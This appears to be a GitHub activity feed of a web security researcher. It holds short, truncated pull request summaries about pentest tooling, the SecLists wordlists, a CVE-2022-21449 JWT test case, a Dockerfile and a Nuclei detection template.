Dominique RIGHETTO
Dominique RIGHETTO
- [ ] [Vulnerability scan](https://github.com/anchore/grype). - [ ] [SBOM descriptor generation](https://github.com/anchore/syft). - [ ] [Reduce the image global size](https://dockersl.im/). 💡 Source: https://twitter.com/abhaybhargav/status/1527334550057017366
# Target - [identify-attack-surface-oauth-oidc-sts.py](https://github.com/righettod/toolbox-pentest-web/blob/master/scripts/identify-attack-surface-oauth-oidc-sts.py) # List of features - [x] Add detection of the support for the **Hybrid flow**. - [x] Add detection of the support of the **claims** parameter...
Hi, This PR use this [documentation](https://docs.spring.io/spring-boot/docs/current/reference/html/application-properties.html#application-properties.actuator.management.server.base-path) to add the prefix `management/` to endpoints list from this [documentation](https://docs.spring.io/spring-boot/docs/current/reference/html/actuator.html#actuator.endpoints):   Command used to extract endpoints: ```shell curl -sk https://docs.spring.io/spring-boot/docs/2.1.7.RELEASE/reference/html/production-ready-endpoints.html | grep...
Hi, This PR performed the following operations on file **[AdobeCQ-AEM.txt](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/AdobeCQ-AEM.txt)**: - Remove leading slash for each line. - Add missing entries based on the sources below. - Sort entries alphabetically....
> **Note**: After a very useful review by @ItsIgnacioPortal , I changed the approach by creating a dedicated script to perform the check and raise the warning. The GitHub workflow...
Hi, This PR propose an implementation to test exposure to [CVE-2022-21449](https://nvd.nist.gov/vuln/detail/CVE-2022-21449). It refer to the issue #65 I tried following the current coding rules as much as possible and tried...
Hi, After reading this [blog post](https://neilmadden.blog/2022/04/19/psychic-signatures-in-java/) about the [CVE-2022-21449](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21449), I was wondering if it can be interesting to add a test case with a JWT token for which the signature...
Hi, First thank you very much for this amazing tool 🥇 This PR add a dockerfile in order to either: * Quickly run the application via docker. * Provide a...
Hello, First, thank you very much for this amazing project 🥇 This PR update the link, referencing the OWASP Secure Headers Project, to the [right one](https://owasp.org/www-project-secure-headers/) in the different flavor...
### Template / PR Information Hi, This PR add a template the detect an instance of the [eArcu](https://www.earcu.com/products) software. - References: https://www.earcu.com/products ### Template Validation I've validated this template locally?...